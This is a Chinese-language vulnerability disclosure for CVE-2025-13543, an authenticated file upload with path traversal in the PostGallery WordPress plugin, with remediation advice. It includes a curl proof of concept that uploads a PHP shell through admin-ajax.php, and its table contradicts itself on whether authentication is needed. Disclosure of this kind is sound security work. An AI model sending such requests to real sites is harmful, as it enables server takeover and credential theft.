CVE-2025-13543 披露公告
本仓库披露了在 PostGallery <= 1.12.5 中发现的一个漏洞,该 WordPress 插件由 rtowebsites 开发。
| CVE ID | 类型 | 组件 | 影响 |
|---|---|---|---|
| CVE-2025-13543 | 已认证(订阅者及以上,Subscriber+)任意文件上传 | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | 未认证的攻击者可以上传任意文件 |
postgalleryAjaxUpload)和 PostGalleryUploader 后端curl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php 和数据库凭据、部署持久后门以及创建恶意管理员账户。lib/ajax-actions/imageUpload.php 中,在处理上传之前,强制实施适当的授权(例如,要求 current_user_can('upload_files'))并验证加密 nonce。admin/PostGalleryUploader.php 中,严格将 uploadFolder 限制为 wp-content/uploads/gallery 的已知子目录,拒绝任何包含 ../ 或绝对路径的值,并在使用前规范化路径。wp_handle_upload() / wp_check_filetype_and_ext(),并将上传限制为不可执行媒体类型的白名单,明确阻止 .php 及其他可执行扩展名在 Web 可访问目录中上传。没想到竟然存在这种类似 CTF 的漏洞……。任意文件上传本身就已经很严重了,居然还伴有目录遍历,真是令人绝望。复现这个漏洞的过程非常有趣。
姓名:MooseLove
角色:独立安全研究员 / 漏洞猎手
联系方式:可根据请求提供
本公告出于公共安全意识而提供。欢迎署名分享。